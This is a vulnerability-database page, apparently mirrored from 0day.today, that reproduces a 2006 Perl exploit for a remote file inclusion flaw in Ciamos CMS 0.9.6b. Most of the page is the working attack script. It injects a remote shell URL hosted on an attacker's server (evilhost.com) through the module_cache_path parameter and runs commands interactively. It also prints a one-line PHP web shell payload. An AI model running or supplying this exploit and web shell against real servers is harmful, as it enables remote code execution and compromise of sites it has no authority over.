Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit

πŸ—“οΈΒ 08 Oct 2006Β 00:00:00Reported byΒ KacperTypeΒ 
zdt
Β zdtπŸ”—Β 0day.todayπŸ‘Β 24Β Views

Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploi

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
=============================================================
Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit
=============================================================



#!/usr/bin/perl

use LWP::UserAgent;

#:::::::::  :::::::::: :::     ::: ::::::::::: :::        
#:+:    :+: :+:        :+:     :+:     :+:     :+:        
#+:+    +:+ +:+        +:+     +:+     +:+     +:+        
#+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+        
#+#+    +#+ +#+         +#+   +#+      +#+     +#+        
##+#    #+# #+#          #+#+#+#       #+#     #+#        
##########  ##########     ###     ########### ########## 
#::::::::::: ::::::::::     :::     ::::    ::::  
#    :+:     :+:          :+: :+:   +:+:+: :+:+:+ 
#    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+ 
#    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+ 
#    +#+     +#+        +#+     +#+ +#+       +#+ 
#    #+#     #+#        #+#     #+# #+#       #+# 
#    ###     ########## ###     ### ###       ### 
#	
#	
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- [Script name: Ciamos CMS 0.9.6b
#- [Script site: http://sourceforge.net/projects/ciamos
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-          Find by: Kacper (a.k.a Rahim)
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Special Greetz: DragonHeart ;-)
#- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
#-      SkD, nukedclx, Ramzes, t3k, dn0d'e, sysios
#-
#- Greetz for all users DEVIL TEAM IRC Channel !!
#[emailΒ protected] Przyjazni nie da sie zamienic na marne korzysci @!
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-            Z Dedykacja dla osoby,
#-         bez ktorej nie mogl bym zyc...
#-           K.C:* J.M (a.k.a Magaja)
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# usage:
# perl exploit.pl <Ciamos Locaction> <shell location> <shell cmd>
#
# perl exploit.pl http://site.com/[Ciamos_Path]/ http://site.com/cmd.txt cmd
#
# cmd shell example: <?passthru($_GET[cmd]);?>
#
# cmd shell variable: ($_GET[cmd]);
###################################################




$sciezka = $ARGV[0];

$sciezkacmd = $ARGV[1];

$komenda = $ARGV[2];

if($sciezka!~/http:\/\// || $sciezkacmd!~/http:\/\// || !$komenda){usage()}

head();

while()
{
print "[shell] \$";
while(<STDIN>)
{
$cmd=$_;
chomp($cmd);

$xpl = LWP::UserAgent->new() or die;

$req = HTTP::Request->new(GET=>$sciezka.'modules/forum/include/config.php?module_cache_path='.$sciezkacmd.'?&'.$komenda.'='.$cmd)or die "\nCouldNot connect\n";
$res = $xpl->request($req);

$return = $res->content;
$return =~ tr/[\n]/[&#234;]/;

if (!$cmd) {print "\nEnter a Command\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot executea blank command in <b>/)

{print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}

elsif ($return =~/^<br.\/>.<b>Warning/) {print "\nInvalid Command\n\n"}

if($return =~ /(.+)<br.\/>.<b>Warning.(.+)<br.\/>.<b>Warning/)
{

$finreturn = $1;
$finreturn=~ tr/[&#234;]/[\n]/;
print "\r\n$finreturn\n\r";
last;


}
else {print "[shell] \$";}}}last;

sub head()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "+          - - [DEVIL TEAM THE BEST POLISH TEAM] - -         +\n";
print "+Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit+\n";
print "+                Find by: Kacper (a.k.a Rahim)               +\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
}
sub usage()
{
head();
print " Usage: perl exploit.pl <Ciamos Locaction> <shell location> <shell cmd>\r\n\n";
print " <Ciamos Locaction> - Full path to Ciamos ex: http://www.site.com/Ciamos/\r\n";
print " <shell location> - Path to cmd Shell e.g http://www.evilhost.com/cmd.txt\r\n";
print " <shell cmd> - Command variable used in php shell \r\n";
print " ============================================================================\r\n";
print "                         Find by: Kacper (a.k.a Rahim)                       \r\n";
print "                           http://www.rahim.webd.pl/                         \r\n";
print "                          Special Greetz: DragonHeart ;-)                    \r\n";
print " ============================================================================\r\n";

exit();
}

#Pozdrawiam wszystkich ;-)


#  0day.today [2018-03-14]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
08 Oct 2006 00:00Current
7.1High risk
Vulners AI Score7.1
ciamos cmsremote file includeexploitperllwp::useragenthttpscriptsourceforgekacperdevil teampolish team
24
.json
Report